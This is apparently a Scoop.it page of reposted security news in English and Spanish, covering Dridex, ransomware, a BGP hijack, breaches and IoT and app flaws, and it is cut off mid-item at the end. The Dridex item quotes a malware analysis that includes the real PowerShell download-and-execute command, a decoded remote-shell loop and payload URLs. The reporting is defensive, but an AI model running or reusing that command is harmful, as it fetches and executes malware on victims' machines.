Security
277 views | +1 today
Follow
Your new post is loading...
Your new post is loading...
Rescooped by Juan Carlos Ruiloba from Cyber Security & Digital Forensics
Scoop.it!

Malware Delivered via Windows Installer Files

Malware Delivered via Windows Installer Files | Security | Scoop.it
SANS Internet Storm Center - A global cooperative cyber threat / internet security monitor and alert system. Featuring daily handler diaries with summarizing and analyzing new threats to networks and internet security events.

Via Constantin Ionel Milos / Milos Constantin
more...
No comment yet.
Rescooped by Juan Carlos Ruiloba from Advanced Threats,Intelligence Technology,CyberSecurity
Scoop.it!

CyberEdge Cyberthreat Defense Report Infographic

CyberEdge Cyberthreat Defense Report Infographic | Security | Scoop.it
CyberEdge's comprehensive study and infographic of 1,100 security professionals' perceptions of the industry - fourth annual survey

Via Constantin Ionel Milos / Milos Constantin
more...
No comment yet.
Rescooped by Juan Carlos Ruiloba from Cyber Security
Scoop.it!

NEW YEAR, NEW LOOK - DRIDEX VIA COMPROMISED FTP

NEW YEAR, NEW LOOK - DRIDEX VIA COMPROMISED FTP | Security | Scoop.it
SOURCE: Information Security Newspaper http://www.securitynewspaper.com/2018/01/19/new-year-new-look-dridex-via-compromised-ftp/ TAGS: Dridex, Dridex banking Trojan Forcepoint Security Labs have recently observed a peculiar email campaign distributing a variant of the Dridex banking trojan. The campaign used compromised FTP sites instead of the more usual HTTP link as download locations for malicious documents, exposing the credentials of the compromised FTP sites in the process. The malicious emails were distributed just before 12:00 UTC on 17 January 2018 and remained active for approximately seven hours. The emails were sent primarily to .COM top level domains (TLDs) with the second, third and fourth top affected TLDs suggesting that major regional targets were France, the UK, and Australia respectively: The sender domains used are observed to be compromised accounts. The sender names rotated around the following names, perhaps to make the emails look more convincing to unsuspecting recipients: admin@ billing@ help@ info@ mail@ no-reply@ sale@ support@ ticket@ Below is a sample malicious email: The campaign used two types of documents. The first is a DOC that abuses DDE to execute the following shell command to download malware: c:\Windows\system32\cmd.exe /k Echo Microsoft Office Document YES && pow^ers^hell.e^xe -W hidden -Exec Bypass -nologo -noprofile -c IEX(New-Object Net.WebClient).DownloadString('http://185.176.221[.]146/download/s/GTz') The above link downloads a B64 encoded string that decodes to the following download code: while (1 -eq 1) try % 0 ; while(($i=$zm.Read($bt,0,$bt.Length)) -ne 0) $d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i); $st= ([text.encoding]::ASCII).GetBytes((iex $d 2>&1)); $zm.Write($st,0,$st.Length); $zm.Flush() catch Start-Sleep -s 10; if($zcl.Connected) $zcl.Close(); } The second type is a XLS file with a Macro that downloads Dridex from the following location: hxxp://theairlab[.]co.za/KJHdey3 It is then executed using the following command: cmd.exe /c START "" C:\Users\<redacted>\AppData\Local\Temp\vanilaice8.exe ANALYSIS The compromised servers do not appear to be running the same FTP software; as such, it seems likely that the credentials were compromised in some other way. The perpetrators of the campaign do not appear to be worried about exposing the credentials of the FTP sites they abuse, potentially exposing the already-compromised sites to further abuse by other groups. This may suggest that the attackers have an abundant supply of compromised accounts and therefore view these assets as disposable. Equally, if a compromised site is used by multiple actors it also makes attribution harder for security professionals and law enforcement. Multiple attributes of the campaign suggest that it may coming from the Necurs botnet: The domains used for distribution were already in our records as compromised domains used in previous Necurs campaigns; Necurs is historically known to spread Dridex; The document downloaders are also similar to those used by Necurs in the past; The download locations of the XLS file also follows the traditional Necurs format. However, the volume of this particular campaign is very low compared to typical Necurs campaigns. Necurs typically sends out millions of emails per campaign, while this campaign was recorded sending just over 9.5K emails in total. Necurs has recently been recorded using malicious links (as opposed to malicious attachments) to distribute Dridex, but the switch to FTP-based download URLs is an unexpected change. PROTECTION STATEMENT Forcepoint customers are protected against this threat at the following stages of attack: Stage 2 (Lure) - Malicious e-mails associated with this attack are identified and blocked. Stage 5 (Dropper File) - Mallicious files are prevented from being downloaded. Stage 6 (Call Home) - Attempts by Dridex to contact its C&C server are blocked. CONCLUSION Cybercriminals constantly update their attack methods to try and ensure maximum infection rates. In this case FTP sites were used, perhaps in an attempt to prevent being detected by email gateways and network policies that may consider FTPs as trusted locations. The presence of FTP credentials in the emails highlights the importance of regularly updating passwords: a compromised account may be abused multiple times by different actors as long as the credentials remain the same. Although there are attributes of the campaign that suggest it is coming from Necurs, the size of the campaign is more or less 'average'. Given Necurs' typical association with very large campaigns, the reason for this remains something of a mystery. Source:https://blogs.forcepoint.com/security-labs/new-year-new-look-dridex-compromised-ftp Information Security Newspaper http://www.securitynewspaper.com/2018/01/19/new-year-new-look-dridex-via-compromised-ftp/
Via David Thomas
more...
No comment yet.
Rescooped by Juan Carlos Ruiloba from Cyber Security
Scoop.it!

Unos hackers han podido robar los datos sanitarios de más de la mitad de la población de Noruega

Unos hackers han podido robar los datos sanitarios de más de la mitad de la población de Noruega | Security | Scoop.it
SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/hacking-incidentes/unos-hackers-han-podido-robar-los-datos-sanitarios-de-mas-de-la-mitad-de-la-poblacion-de-noruega/ TAGS: hackers, Norway Parece que un grupo de hackers o un hacker individual ha robado los datos sanitarios de más de la mitad de la población de Noruega, según informan diversos medios locales. El ataque habría sido realizado el pasado 8 de enero, cuando la Autoridad de Salud Regional Health South-East (en el sudeste del país) anunció una brecha de seguridad en su sitio web. HelseCERT, que es el Equipo de Respuesta ante Emergencias Informáticas del sector sanitario noruego, ha identificado tráfico sospechoso procedente de la red de Health South-East. Una investigación llevada a cabo por el personal IT de Sykehuspartner HF, empresa perteneciente a Health South-East, ha mostrado evidencias de una importante brecha de datos. En una declaración conjunta realizada por Health South-East y Sykehuspartner HF se ha explicado que “esta es una situación grave y se han tomado medidas para limitar el daño causado por este incidente”. Health South-East no duda que ha sido “un jugador profesional y avanzado” el que está detrás del ataque, mientras que las fuerzas de la ley y el Equipo de Respuesta ante Emergencias Informáticas nacional han sido notificados para que procedan a actuar. El Ministro de Sanidad ha comentado que entre las medidas tomadas está la eliminación de la amenaza. Health South-East gestiona la sanidad en nueve de los dieciocho condados de los que se compone Noruega, incluyendo la capital y ciudad más poblada del país, Oslo. Esto aumenta de forma significativa la cantidad de personas afectadas, que podría ascender a los 2,9 millones de los 5,2 millones de habitantes que tiene Noruega. La situación está generando bastante alarma en el país. Por un lado hay algunos investigadores en seguridad de la propia Noruega que critican a Health South-East por la pobre seguridad implementada en sus sistemas, mientras que la autoridad sanitaria está pidiendo calma para evitar que la tensión vaya a más. Sin embargo, muchos sospechan que se está escondiendo muchos datos en torno a este asunto. Fuente:https://www.muyseguridad.net/2018/01/19/hackers-robar-datos-sanitarios-noruega/ Noticias de seguridad informática http://noticiasseguridad.com/hacking-incidentes/unos-hackers-han-podido-robar-los-datos-sanitarios-de-mas-de-la-mitad-de-la-poblacion-de-noruega/
Via David Thomas
more...
No comment yet.
Rescooped by Juan Carlos Ruiloba from Cyber Security
Scoop.it!

Tastylock, una nueva variante del ransomware Cryptomix

Tastylock, una nueva variante del ransomware Cryptomix | Security | Scoop.it
SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/malware-virus/tastylock-una-nueva-variante-del-ransomware-cryptomix/ TAGS: ransomware Cryptomix, Tastylock Sí, una nueva variante ha aparecido de Cryptomix. Se trata de una práctica muy popular entre los ciberdelincuentes. Esto les permite lanzar una “nueva” amenaza sin la necesidad de realizar cambios importantes en el código de la misma. Bautizada como Tastylock, añade esta extensión a los archivos del sistema que se han visto afectados. Por el momento, parece que el acceso a los archivos no se puede recuperar. El funcionamiento podría decirse que es idéntico al de otras amenazas del mismo tipo. La única diferencia es la vía de difusión. Y es que, mientras otras amenazas utilizan ubicaciones de red o unidades extraibles, esta variante se vale de las cuentas de correo electrónico utilizadas por el usuario en el equipo infectado para distribuirse a otros usuarios. Relacionado con este tema, indicar que, la dirección original que se utiliza es t_tasty@aol.com. Tal y como sucede con otro tipo ransomwares, se utilizan diversas temáticas para llamar la atención del usuario y conseguir que acceda al correo y descargue el ejecutable o acceda al enlace facilitado en el cuerpo del mismo. cualquiera de las dos vías es una buena opción si se quiere distribuir una amenaza. Pero aún hay más detalles que debemos conocer de TastyLock Información de este ransomware El correo mencionado anteriormente es el mismo que los ciberdelincuentes facilitan al usuario para ponerse en contacto con ellos. El archivo de ayuda posee el mismo nombre que en el caso de Cryptomix:  _HELP_INSTRUCTION.TXT. La única diferencia es que en el fichero de ayuda no se especifica ni la cantidad a abonar ni el lugar en el que realizar el ingreso. Esto obliga a contactar con los ciberdelincuentes desde un primer momento. En el fichero de texto también encontramos el ID asociado al equipo infectado. Por el momento no se posee más información de Tastylock. Lo que ya hemos mencionado y repetimos de nuevo, es que no existe ninguna herramienta que permita recuperar los archivos afectados. Cómo puedo proteger mi equipo de Tastylock y otros ransomware Lo fundamental es disponer una serie de buenas prácticas a la hora de utilizar determinados servicios. El correo electrónico es sin lugar a dudas el principal, pero también la navegación a través de páginas web requiere de ciertas precauciones. Resulta muy importante extremar las precauciones a la hora de descargar adjuntos o contenido de determinadas páginas web. Podría ser el instalador de una amenaza. Si no podemos evitar realizar la descarga, es recomendable realizar un análisis previo antes de la apertura. Para ellos nos podemos valer de servicios como VirusTotal. La utilización de copias de seguridad es un aspecto importante. ¿Por qué? Si nos vemos afectado por una amenaza de este tipo siempre podremos recuperar casi la totalidad de la información afectada. De ahí que este sea una buena práctica. También hay que decir, que, no se recomienda almacenarlas en el mismo equipo. Muchos ciberdelincuentes programan sus amenazas para que afecten también copias de seguridad. De esta forma, no se podría recurrir a estas para recuperar la información. Noticias de seguridad informática http://noticiasseguridad.com/malware-virus/tastylock-una-nueva-variante-del-ransomware-cryptomix/
Via David Thomas
more...
No comment yet.
Rescooped by Juan Carlos Ruiloba from Cyber Security
Scoop.it!

“Suspicious” event routes traffic for big-name sites through Russia

“Suspicious” event routes traffic for big-name sites through Russia | Security | Scoop.it
SOURCE: Information Security Newspaper http://www.securitynewspaper.com/2017/12/14/suspicious-event-routes-traffic-big-name-sites-russia/ TAGS: “intentional” BGP mishap, BGP routes, Russia Google, Facebook, Apple, and Microsoft all affected by “intentional” BGP mishap. Traffic sent to and from Google, Facebook, Apple, and Microsoft was briefly routed through a previously unknown Russian Internet provider Wednesday under circumstances researchers said was suspicious and intentional. The unexplained incident involving the Internet's Border Gateway Protocol is the latest to raise troubling questions about the trust and reliability of communications sent over the global network. BGP routes large-scale amounts of traffic among Internet backbones, ISPs, and other large networks. But despite the sensitivity and amount of data it controls, BGP's security is often based on trust and word of mouth. Wednesday's event comes eight months after large chunks of network traffic belonging to MasterCard, Visa, and more than two dozen other financial services were briefly routed through a Russian government-controlled telecom, also under suspicious circumstances. According to a blog post published Wednesday by Internet monitoring service BGPMon, the hijack lasted a total of six minutes and affected 80 separate address blocks. It started at 4:43 UTC and continued for three minutes. A second hijacking occurred at 7:07 UTC and also lasted three minutes. Meanwhile, a second monitoring service, Qrator Labs, said the event lasted for two hours, although the number of hijacked address blocks varied from 40 to 80 during that time.
Enlarge / A timeline of Wednesday's BGP hijacking as measured by Qrator Labs.
Qrator Labs
Not just another BGP error While BGP rerouting events are often the result of human error rather than malicious intent, BGPMon researchers said several things made Wednesday's incident "suspicious." First, the rerouted traffic belonged to some of the most sensitive companies, which—besides Google, Facebook, Apple, and Microsoft—also included Twitch, NTT Communications, and Riot Games. Besides the cherrypicked targets, hijacked IP addresses were broken up into smaller, more specific blocks than those announced by affected companies, an indication the rerouting was "intentional." "Some of these prefixes don't normally exist, i.e., there was a Google /16 (expected) and all of a sudden a more specific /24 (smaller block)," BGPMon researcher Andree Toonk wrote in an email. "Google did not announce that block, so someone made that up. Normally with BGP configuration errors, we don't see new prefixes." Companies receive IPv4 addresses in blocks whose sizes are measured by the number following the slash. The smaller the number after the slash, the more addresses are included. A /16 block has about 64,000 usable addresses, while a /24 has only 254. In BGP routing tables, smaller, more specific blocks generally get preference over the larger blocks. Newly announced routes with smaller block sizes also stand a better chance of being picked up by other Internet backbones and ISPs since the route is more attractive. The rerouting was the result of a so-called autonomous system located in Russia adding entries to BGP tables claiming it was the rightful origin of the 80 affected prefixes. In short order, a variety of autonomous systems started complying with the request. This caused large amounts of traffic sent to and received by the affected companies to pass through the Russian AS 39523 before being sent to its final destination. ISPs that picked up the new route included PJSC MegaFon, Hurricane Electric, Zayo, Nordunet, and Telstra. Who is AS39523? Little is currently known about AS39523, the previously unused autonomous system that initiated the hijacking. AS39523 hasn't been active in years, except for one brief BGP incident in August that also involved Google. It remains unclear what engineers inside AS39523 did with what could be terabytes of data that passed through their servers. Generally, email and Web traffic is encrypted using transport layer security or other schemes. For years, researchers have devised ways to weaken or altogether break such encryption protections or work around them. To accomplish this, they've used attacks with names including Logjam and DROWN. To date, there are no known instances of BGP hijackers successfully decrypting rerouted traffic, but it's also not possible to rule out such feats. At a minimum, the Russian provider could have copied the data and is storing it in case a new crypto attack is discovered in the future. Wednesday's event is only the latest example of how the Internet's BGP has been abused or misconfigured. The previously mentioned incident in April—in which traffic for Visa, MasterCard, and other financial services passed through a Russian ISP—also appears suspicious. In 2013, researchers documented frequent BGP hijacks on a scale that had never been seen before. The past few years have seen no shortage of other documented BGP hacks that have occurred in the wild. To prevent future incidents, ISPs and backbones will have to be more stringent than they currently are about trusting newly announced routes. "This hijack highlights a common problem that arises due to lack of route filtering," Alexander Lyamin, CEO of Qrator Labs, told Ars. "We can blame AS39523 for the accident. But without proper filters at the intermediate transit providers' boundaries, we are doomed to see similar incidents again and again." Source:https://arstechnica.com/information-technology/2017/12/suspicious-event-routes-traffic-for-big-name-sites-through-russia/ Information Security Newspaper http://www.securitynewspaper.com/2017/12/14/suspicious-event-routes-traffic-big-name-sites-russia/
Via David Thomas
more...
No comment yet.
Rescooped by Juan Carlos Ruiloba from Cyber Security
Scoop.it!

Un fichero con 1.400 millones contraseñas en texto plano circula por la Dark Web y los portales torrent

Un fichero con 1.400 millones contraseñas en texto plano circula por la Dark Web y los portales torrent | Security | Scoop.it
SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/hacking-incidentes/un-fichero-con-1-400-millones-contrasenas-en-texto-plano-circula-por-la-dark-web-y-los-portales-torrent/ TAGS: Dark Web, torrent Una compañía dedicada a la seguridad informática ha encontrado en la deep web una gigantesca base de datos en la que se encuentran nada menos que 1.400 millones de contraseñas de diferentes servicios de Internet. Es, probablemente, la base de datos más grande de los últimos tiempos en la que se recopilan direcciones de correo electrónico y contraseñas asociadas de diversos ‘hackeos’ y robos de claves de inicio de sesión. Según informa esta compañía de seguridad informática, esta enorme base de datos contiene 1.400 millones de contraseñas, y por supuesto sus direcciones de correo electrónico o nombres de usuarios asociados, y está circulando por la deep web en forma de torrent. Es decir, que se está compartiendo de manera abierta, y además su contenido está en texto plano. No hay ningún tipo de cifrado sobre la información, y cualquiera que acceda a la base de datos puede aprovechar la información que allí se refleja. Es algo que está disponible en la deep web desde el pasado 5 de diciembre, y después de que se hubiera subido a uno de los foros más populares. Es la mayor recopilación de contraseñas encontrada nunca en la deep web En palabras del propio fundador de esta compañía, es la mayor recopilación de contraseñas que se ha encontrado nunca en la deep web. Afortunadamente, aunque de forma relativa, no es una nueva filtración y las contraseñas no corresponden a un nuevo robo sobre ningún tipo de servicio. Sencillamente es una recopilación de filtraciones anteriores que se han ido dando durante los últimos años. No obstante, lo preocupante en todo esto es que esta vez la disponibilidad no está limitada para la base de datos, porque toda la información está disponible en texto plano y porque se está compartiendo entre pares. La base de datos está perfectamente clasificada en varios niveles, con todos los datos relativos a un mismo correo electrónico, o a un nombre de usuario, y es una recolección de 252 vulneraciones sobre la seguridad de servicios como LinkedIn, MySpace, Netflix, Last.fm, Badoo, Minecraft, YouPorn y muchos otros servicios. Lo mejor, para los usuarios, es que por seguridad se modifiquen las contraseñasde servicios como los anteriores, o que se active la autenticación en dos pasos si es posible. Fuente:https://www.adslzone.net/2017/12/12/1-400-millones-contrasenas-deep-web/ Noticias de seguridad informática http://noticiasseguridad.com/hacking-incidentes/un-fichero-con-1-400-millones-contrasenas-en-texto-plano-circula-por-la-dark-web-y-los-portales-torrent/
Via David Thomas
more...
No comment yet.
Rescooped by Juan Carlos Ruiloba from Cyber Security
Scoop.it!

VULNERABILITY FOUND IN TWO KEYLESS ENTRY LOCKS

VULNERABILITY FOUND IN TWO KEYLESS ENTRY LOCKS | Security | Scoop.it
SOURCE: Information Security Newspaper http://www.securitynewspaper.com/2017/12/12/vulnerability-found-two-keyless-entry-locks/ TAGS: TCP network traffic, TCP/IP Researchers at Dell Secureworks are warning a vulnerability in two keyless entry products could allow local attackers to lock and unlock doors and create illegitimate RFID badges by sending unauthenticated requests to affected devices. Impacted are two AMAG Technology Symmetry IP-based access door controllers used in keyless door models EN-1DBC and EN-2DBC. Researchers say if the devices deployed with default configurations, attackers could abuse the systems by sending unauthenticated requests to door controllers via serial communication over TCP/IP. “An attacker with network access to vulnerable door controllers could remotely trigger door lock and unlock commands,” wrote Secureworks in technical write-up of the vulnerability.   Researchers achieved this by monitoring TCP network traffic between the AMAG Symmetry access control server and the EN-1DBC and EN-2DBC door controllers. They were then able to reverse engineer the data structure of the unauthenticated network communication to create requests to lock and unlock doors. In addition, researchers devised a way for an attacker to inject arbitrary ID badge information into the locks’ internal controller databases, allowing the adversary to lock and unlock doors with illegitimate ID badges. “The lack of encryption in the default deployment of devices allows attackers to inject fake values of RFID badges into keyless door’s controller database,” said Mike Kelly, principal consultant, with Secureworks’ Red Team. “Once that’s done, I can use a illegitimate RFID badge and open the door,” he said. Secureworks researchers Kelly and John Mocuta, principal security consultant at Secureworks, are both credited for discovering the vulnerability earlier this summer. The bug was publicly disclosed Saturday. “This vulnerability is an out of the box situation with default program settings,” AMAG states in the Secureworks report. “All AMAG products currently supported (which includes the EN-1DBC and EN-2DBC listed) include AES encrypted communications between network components if configured.” AMAG Technology told Threatpost via email the issue only impacts the EN-1DBC and EN-2DBC controllers. “Customers decide whether or not to turn on encryption.  AMAG highly recommends all customers implement encryption,” the company said. The vulnerability (CVE-2017-16241) has a CVSS severity rating of high (9.3). Secureworks found the vulnerability in April and after several attempts, AMAG acknowledged the issue on May 25 and public disclosure of vulnerability was Dec. 8. Mitigation against outside attacks includes simply enabling encryption on affected devices. “A lot of devices are not built to be secure by default,” said Trenton Ivey, offensive researcher at Secureworks. “Instead, they’re built to be convenient by default. What we find is people buy a device and expect it to perform a desired function out of the box and then leave it at that. Vendors are starting to become more aware of this problem. But the IoT space and other sectors are still a bit behind on the idea of building systems secure by default,” Ivey said. Source:https://threatpost.com/vulnerability-found-in-two-keyless-entry-locks/129132/ Information Security Newspaper http://www.securitynewspaper.com/2017/12/12/vulnerability-found-two-keyless-entry-locks/
Via David Thomas
more...
No comment yet.
Rescooped by Juan Carlos Ruiloba from Cyber Security
Scoop.it!

Man-in-the-middle flaw left smartphone banking apps vulnerable

Man-in-the-middle flaw left smartphone banking apps vulnerable | Security | Scoop.it
SOURCE: Information Security Newspaper http://www.securitynewspaper.com/2017/12/08/man-middle-flaw-left-smartphone-banking-apps-vulnerable/ TAGS: Android Devices, banking apps, iOS

A flaw in certificate pinning exposed customers of a number of high-profile banks to man-in-the-middle attacks on both iOS and Android devices.

A vulnerability in the mobile apps of major banks could have allowed attackers to steal customers' credentials including usernames, passwords, and pin codes, according to researchers. The flaw was found in apps by HSBC, NatWest, Co-op, Santander, and Allied Irish bank. The banks in question have now all updated their apps to protect against the flaw. Uncovered by researchers in the Security and Privacy Group at the University of Birmingham, the vulnerability allows an attacker who is on the same network as the victim to perform a man-in-the-middle attack and steal information. The vulnerability lay in the certificate pinning technology, a security mechanism used to prevent impersonation attacks and use of fraudulent certificates by only accepting certificates signed by a single pinned CA root certificate. While certificate pinning usually improves security, a tool developed by the researchers to perform semi-automated security-testing of mobile apps found that a flaw in the technology meant standard tests failed to detect attackers trying to take control of a victim's online banking. As a result, certificate pinning can hide the lack of proper hostname verification, enabling man-in-the-middle attacks. The vulnerability potentially put 10 million banking app users at risk from attacks. Image: iStock The findings have been outlined in a research paper and presented at the Annual Computer Security Applications Conference in Orlando, Florida. The tool was run on 400 security critical apps in total, leading to the discovery of the flaw. "In general, the security of the apps we examined was very good, the vulnerabilities we found were hard to detect, and we could only find so many weaknesses due to the new tool we developed," said Dr Tom Chothia, lecturer at the university and one of the authors of the report. "It's impossible to tell if these vulnerabilities were exploited, but if they were, attackers could have got access to the banking app of anyone connected to a compromised network," he added. Tests found apps from some of the largest banks contained the flaw which, if exploited, could have enabled attackers to decrypt, view, and even modify network traffic from users of the app. That could allow them to view information entered and perform any operation that app can usually perform -- such as making payments or transferring of funds. Other attacks allowed hackers to perform in-app phishing attacks against Santander and Allied Irish bank users, allowing attackers to take over part of the screen while the app was running and steal the entered credentials. While certificate pinning is often enough to ensure security, in this instance, its application actually hid flaws because penetration testing couldn't work around the system. "As this flaw is generally difficult to detect from normal analysis techniques, we have developed a detection tool that is semi-automated and easy to operate. This will help developers and penetration testers ensure their apps are secure against this attack," said Chris McMahon-Stone, research student in the Security and Privacy Group at the University of Birmingham and co-author of the paper. The researchers have worked with the National Cyber Security Centre and all the banks involved to fix the vulnerabilities, noting that the current version of all the apps affected by the pinning vulnerability are now secure. Source:http://www.zdnet.com/article/man-in-the-middle-flaw-left-smartphone-banking-apps-vulnerable/
Information Security Newspaper http://www.securitynewspaper.com/2017/12/08/man-middle-flaw-left-smartphone-banking-apps-vulnerable/
Via David Thomas
more...
No comment yet.
Rescooped by Juan Carlos Ruiloba from Cyber Security
Scoop.it!

Un popular antivirus chino para Android ha estado recolectando datos de forma ilegítima

Un popular antivirus chino para Android ha estado recolectando datos de forma ilegítima | Security | Scoop.it
SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/seguridad-movil/un-popular-antivirus-chino-para-android-ha-estado-recolectando-datos-de-forma-ilegitima/ TAGS: android Un popular antivirus chino presente en la Play Store para Android, DU Antivirus Security, ha sido eliminado y restituido por Google tras detectar Check Point que estaba realizando una recolección de datos ilegítima. Según los datos que se pueden extraer de la propia Play Store, DU Antivirus Security ha sido descargado entre 10 y 50 millones de veces, por lo que estamos hablando de una aplicación que ha conseguido cierta notoriedad en su segmento. Sin embargo, los investigadores de Check Point descubrieron que, además de presuntamente proteger los dispositivos Android del malware, ha estado recolectando datos como identificadores únicos, lista de contactos, registros de llamadas e información de localización.
En el proceso de recolección de datos DU Antivirus Security los cifraba y los enviaba a un servidor cuya IP era 47.88.174.218. Al principio los investigadores pensaron que pertenecía al autor de algún malware, pero tras investigar descubrieron que los registros de DNS y los subdominios adyacentes mostraban que los dominios principales estaban almacenados en un servidor registrado por un empleado de Baidu (el “Google chino”) llamado Zhan Liang Liu. Los datos recolectados eran luego usados en otra aplicación llamada “Caller ID & Call Block – DU Caller”, la cual también pertenece a DU Group y ofrece información a los usuarios sobre las llamadas de entrada. Tras ser notificada de forma secreta por Check Point, Google decidió eliminar DU Antivirus Security el 21 de agosto, aunque permitió que volviera el 24 del mismo mes después de que su desarrollador eliminase el código encargado de recolectar la información de los usuarios. Como defensa de su acción, Google ha argumentado que aquel mecanismo no estaba especificado en la política de privacidad ni en la obtención de permisos del usuario en el proceso de instalación. Las versiones afectadas de la aplicación son la v3.1.5 y posiblemente las anteriores, según Check Point. Sin embargo, el mecanismo de recolección ilegítima hallado en DU Antivirus Security no termina ahí, ya que este ha sido encontrado en otras 30 aplicaciones, de las cuales 12 están o estaban presentes en la Play Store. Según la estadísticas de la tienda de Google, han sido descargadas entre 24 y 89 millones de veces, lo que delata el gran impacto de este software, que puede ser etiquetado como malware. Check Point ha publicado una lista de las aplicaciones encontradas en la Play Store que utilizan el mecanismo de recolección de datos ilegítimo junto a las que está fuera de la tienda. Aplicaciones halladas en la Play Store: Aplicaciones halladas fuera de la Play Store: com.power.core.setting com.friendivity.biohazard.mobo com.energyprotector.tool com.power.core.message batterysaver.cleaner.speedbooster.taskkiller.phonecooler com.rammanager.pro com.memoryanalysis.speedbooster com.whosthat.callerid speedbooster.memorycleaner.phonecleaner.phonecooler com.example.demos com.android.fb antivirus.mobilesecurity.antivirusfree.antivirusandroid speedtest.networksecurity.internetbooster com.ramreleaser.speedbooster com.dianxinos.optimizer.duplay com.coolkeeper.instacooler com.memoryreleaser.booster com.freepopularhotvideo.hotube Fuente:https://www.muyseguridad.net/2017/09/19/antivirus-chino-android-recolectando-datos/ Noticias de seguridad informática http://noticiasseguridad.com/seguridad-movil/un-popular-antivirus-chino-para-android-ha-estado-recolectando-datos-de-forma-ilegitima/
Via David Thomas
more...
No comment yet.
Rescooped by Juan Carlos Ruiloba from Cyber Security
Scoop.it!

Malware Uses Security Cameras With Infrared Capabilities to Steal Data

Malware Uses Security Cameras With Infrared Capabilities to Steal Data | Security | Scoop.it
SOURCE: Information Security Newspaper http://www.securitynewspaper.com/2017/09/20/malware-uses-security-cameras-infrared-capabilities-steal-data/ TAGS: malware, surveillance cameras Proof-of-concept malware created by a team of Israeli researchers uses the infrared capabilities of modern security cameras as a channel for data exfiltration, but also to receive new commands from its operators. Named aIR-Jumper, the malware is meant to be installed on computers that interact with security surveillance cameras/software, or on a computer in the same network with the camera, so the attacker can have a way to hack his way into the device. Camera's infrared LEDs can be used for data theft, control The malware works by taking data collected from an infected computer, breaking it down into binary ones and zeros, and leveraging the camera's API make the device's infrared LEDs blink, using this mechanism as a way to exfiltrate data from an infected network. An attacker sitting in the range of the security camera's infrared LED will be able to record the blinking and use special software that reconstructs the blinks and pauses into the ones and zeros of the stolen data. Similarly, an attacker can use an infrared LED to send new commands to a security camera inside an infected network. The malware can watch the camera's video feed, detect infrared LED transmissions at preset time intervals, and convert the incoming blinks into new commands it has to execute. Surveillance and security cameras are equipped with infrared LEDs as a way to enable night vision. Because infrared light is imperceptible to the human eye, any communications to and from the compromised network are invisible to all bystanders. aIR-Jumper created with air-gapped networks in mind Malware like this was created for stealing data from air-gapped networks that are disconnected from the Internet for security purposes. The aIR-Jumper malware provides a perfect medium that targets do not think as a potential data exfiltration channel. In addition, the malware can also be deployed on Internet-connected networks but used as a covert exfiltration medium that bypasses any firewalls and antivirus solutions and leaves minimal traces in log files. Because of today's proliferation of CCTV and surveillance solutions, malware like aIR-Jumper could be used to steal data and control malware installed on a wide variety of networks, ranging from corporations to secure government institutions, and from police departments to advanced research labs. Exfiltration speeds are low but aIR-Jumper is more reliable "Our evaluation shows that an attacker can use [infrared] and surveillance cameras to communicate over the air-gap to a distance of tens to hundreds of meters away," researchers say. "Data can be leaked from [a] network at a bit rate of 20 bit/sec (per camera) and be delivered to the network at bit rate of more than 100 bit/sec (per camera)," researchers added. The exfiltration speed is low compared to similar experiments carried out by the same group of researchers. Previous findings show that router LEDs are the best data exfiltration medium from air-gapped networks. Nonetheless, routers and switches are usually encased in data centers or special boxes across a company's headquarters, while security cameras sit outside in the open, where attackers can easily interact with the devices. In addition, researchers argue that infrared signals are better than router LEDs because infrared signals bounce of nearby surfaces with a higher reflection rate, and attackers don't necessarily need a line of sight to the security camera itself.
Furthermore, researchers say that aIR-Jumper could be modified to work with other devices that use infrared LEDs, such as smart doorbells. In their research paper titled "aIR-Jumper: Covert Air-Gap Exfiltration/Infiltration via Security Cameras & Infrared (IR)," researchers propose a series of mitigations, both software and hardware related, such as window shielding, firmware controls for disabling IR support, IR LED activity monitoring, iregular access to camera API functions, and others. Researchers also published two videos showing how they send commands to the aIR-Jumper malware via the security camera, and how they exfiltrate data from the affected network. [embed]https://youtu.be/auoYKSzdOj4[/embed] [embed]https://youtu.be/om5fNqKjj2M[/embed]
The aIR-Jumper malware was created by a team of talented researchers from the Cyber Security Research Center at the Ben-Gurion University of the Negev in Israel. The same team is also behind various other kooky data exfiltration experiments that combine malware and the physical world.
LED-it-Go - exfiltrate data from air-gapped systems via an HDD's activity LED SPEAKE(a)R - use headphones to record audio and spy on nearby users 9-1-1 DDoS - launch DDoS attacks that can cripple a US state's 911 emergency systems USBee - make a USB connector's data bus give out electromagnetic emissions that can be used to exfiltrate data AirHopper - use the local GPU card to emit electromagnetic signals to a nearby mobile phone, also used to steal data Fansmitter - steal data from air-gapped PCs using sounds emanated by a computer's GPU fan DiskFiltration - use controlled read/write HDD operations to steal data via sound waves BitWhisper - exfiltrate data from non-networked computers using heat emanations Unnamed attack - uses flatbed scanners to relay commands to malware infested PCs or to exfiltrate data from compromised systems xLED - use router or switch LEDs to exfiltrate data Shattered Trust - using backdoored replacement parts to take over smartphones
Information Security Newspaper http://www.securitynewspaper.com/2017/09/20/malware-uses-security-cameras-infrared-capabilities-steal-data/
Via David Thomas
more...
No comment yet.
Rescooped by Juan Carlos Ruiloba from Cyber Security
Scoop.it!

Así funciona el peligroso ransomware Paradise que usa cifrado RSA

Así funciona el peligroso ransomware Paradise que usa cifrado RSA | Security | Scoop.it
SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/malware-virus/asi-funciona-el-peligroso-ransomware-paradise-que-usa-cifrado-rsa/ TAGS: Paradise, ransomware El ransomware es la peor amenaza informática a la que todos los usuarios, y todas las empresas, nos hemos enfrentado. Este tipo de malware ataca directamente a lo más valioso, los datos, los cuales, una vez se toma una víctima, cifra y pide un rescate a cambio de la supuesta clave con la que descifrar los datos, clave que, en muchas ocasiones, ni siquiera llega a quien ha pagado el rescate. Dentro de este tipo de malware, además, existen una gran variedad de variantes, cada una con unas características, un comportamiento y, por supuesto, unos algoritmos de cifrado que buscan impedir que los usuarios recuperen sus datos si no pagan, como hace el ransomware Paradise. Paradise no es un ransomware precisamente nuevo, sino más bien es desconocido debido a la falta de muestras para poder estudiarlo. Por suerte, hace algunas horas, los expertos de seguridad de Bleeping Computer se han podido hacer con una muestra de manera que han podido estudiar esta amenaza y entender un poco mejor cómo funciona este ransomware cada vez más activo en la red. El ransomware Paradise funciona como un RaaS (Ransomware as a Service), es decir, en lugar de vender el malware como tal, ellos tienen el código, los binarios y solo 